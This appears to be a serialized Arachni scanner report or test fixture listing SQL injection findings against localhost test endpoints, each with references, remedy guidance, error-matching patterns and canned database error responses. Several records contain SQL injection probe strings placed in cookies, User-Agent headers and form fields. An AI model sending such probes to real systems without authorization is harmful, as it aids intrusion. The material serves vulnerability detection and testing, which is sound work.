http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: cookie2 url: http://localhost:7362/postgresql/cookie/append elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie value) :injected: cookie value) :combo: !binary "Y29va2llMg==": cookie value) :action: http://localhost:7362/postgresql/cookie/append :verification: :id: ! 'PostgreSQL query failed:' var: cookie2 url: http://localhost:7362/postgresql/cookie/append injected: cookie value) id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: cookie remarks: {} method: GET response: ! 
'PostgreSQL query failed: supplied argument is not a valid PostgreSQL result pg_query() [: pg_exec() [: PostgreSQL.*ERROR Warning stuff pg_ stuff valid PostgreSQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value) response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/postgresql/cookie/flip elem: cookie method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ) :altered: Parameter flip :element: cookie :params: {} :follow_location: true :cookies: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ): !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/postgresql/cookie/flip :verification: :id: ! 'PostgreSQL query failed:' var: Parameter flip url: http://localhost:7362/postgresql/cookie/flip injected: '' id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: cookie remarks: {} method: GET response: ! 
'[nil, "PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid PostgreSQL result\n"]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg1 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: User-Agent url: http://localhost:7362/postgresql/header/append elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. 
tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user'`-- :injected: arachni_user'`-- :combo: User-Agent: arachni_user'`-- :action: http://localhost:7362/postgresql/header/append :verification: :id: ! 'PostgreSQL query failed:' var: User-Agent url: http://localhost:7362/postgresql/header/append injected: arachni_user'`-- id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: header remarks: {} method: GET response: ! 
'PostgreSQL query failed: supplied argument is not a valid PostgreSQL result pg_query() [: pg_exec() [: PostgreSQL.*ERROR Warning stuff pg_ stuff valid PostgreSQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user'`-- Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzoyMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/postgresql/header/flip elem: header method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:PostgreSQL query failed:) :match: ! 'PostgreSQL query failed:' :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :injected_orig: ! '''`--' :altered: Parameter flip :element: header :params: :follow_location: true :headers: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :injected: '' :combo: ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/postgresql/header/flip :verification: :id: ! 'PostgreSQL query failed:' var: Parameter flip url: http://localhost:7362/postgresql/header/flip injected: '' id: ! 'PostgreSQL query failed:' regexp: (?i-mx:PostgreSQL query failed:) regexp_match: ! 'PostgreSQL query failed:' elem: header remarks: {} method: GET response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, "PostgreSQL query failed:\nsupplied argument is not a valid PostgreSQL result\npg_query() [:\npg_exec() [:\nPostgreSQL.*ERROR\nWarning stuff pg_ stuff\nvalid PostgreSQL result\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev ! 
'''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzMw !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozMiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/mysql/form/append elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: true references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/mysql/form/append :verification: :id: supplied argument is not a valid MySQL var: input url: http://localhost:7362/mysql/form/append injected: default'`-- id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: form remarks: :stuff: - Blah - Blah2 method: GET response: ! 
'supplied argument is not a valid MySQL Column count doesn''t match value count at row mysql_fetch_array() on MySQL result index You have an error in your SQL syntax; You have an error in your SQL syntax near MySQL server version for the right syntax to use [MySQL][ODBC Column count doesn''t match Table ''Stuff'' doesn''t exist SQL syntax stuff MySQL Warning stuff mysql_ valid MySQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mzg3 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mysql/form/flip elem: form method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: form :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! 
'''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mysql/form/flip :verification: :id: supplied argument is not a valid MySQL var: Parameter flip url: http://localhost:7362/mysql/form/flip injected: '' id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: form remarks: {} method: GET response: ! '["supplied argument is not a valid MySQL\nColumn count doesn''t match value count at row\nmysql_fetch_array()\non MySQL result index\nYou have an error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff mysql_\nvalid MySQL result\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDA5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: input url: http://localhost:7362/mysql/link/append?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! 
'''`--' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default'`-- :follow_location: true :injected: default'`-- :combo: !binary "aW5wdXQ=": default'`-- :action: http://localhost:7362/mysql/link/append?input=default :verification: :id: supplied argument is not a valid MySQL var: input url: http://localhost:7362/mysql/link/append?input=default injected: default'`-- id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: link remarks: {} method: GET response: ! 'supplied argument is not a valid MySQL Column count doesn''t match value count at row mysql_fetch_array() on MySQL result index You have an error in your SQL syntax; You have an error in your SQL syntax near MySQL server version for the right syntax to use [MySQL][ODBC Column count doesn''t match Table ''Stuff'' doesn''t exist SQL syntax stuff MySQL Warning stuff mysql_ valid MySQL result ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mzg3 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! 
"User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: [] internal_modname: SQLInjection internal_modname: SQLInjection - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection var: Parameter flip url: http://localhost:7362/mysql/link/flip?input=default elem: link method: GET name: SQL Injection description: SQL code can be injected into the web application. tags: - sql - injection - regexp - database - error cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being included in database queries." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: SQL Injection variations: - !ruby/object:Arachni::Issue verification: false references: UnixWiz: http://unixwiz.net/techtips/sql-injection.html Wikipedia: http://en.wikipedia.org/wiki/SQL_injection SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html OWASP: http://www.owasp.org/index.php/SQL_Injection opts: :redundant: false :async: true :regexp: (?i-mx:supplied argument is not a valid MySQL) :match: supplied argument is not a valid MySQL :substring: :ignore: - !binary |- U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA== - !binary |- QWNjZXNzIGRlbmllZCBmb3IgdXNlcg== :elements: - link - form - cookie - header - body :train: :format: - 2 :param_flip: true :injected_orig: ! '''`--' :altered: Parameter flip :element: link :params: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! 
'''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :follow_location: true :injected: '' :combo: !binary "aW5wdXQ=": !binary |- ZGVmYXVsdA== ! '''`--': !binary |- OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy OGQ3YmNkMjQ1NzU4ZDViOWM1OQ== :action: http://localhost:7362/mysql/link/flip?input=default :verification: :id: supplied argument is not a valid MySQL var: Parameter flip url: http://localhost:7362/mysql/link/flip?input=default injected: '' id: supplied argument is not a valid MySQL regexp: (?i-mx:supplied argument is not a valid MySQL) regexp_match: supplied argument is not a valid MySQL elem: link remarks: {} method: GET response: ! '["supplied argument is not a valid MySQL\nColumn count doesn''t match value count at row\nmysql_fetch_array()\non MySQL result index\nYou have an error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff mysql_\nvalid MySQL result\n", nil]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NDA5 !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: SQL Injection description: SQL code can be injected into the web application. 
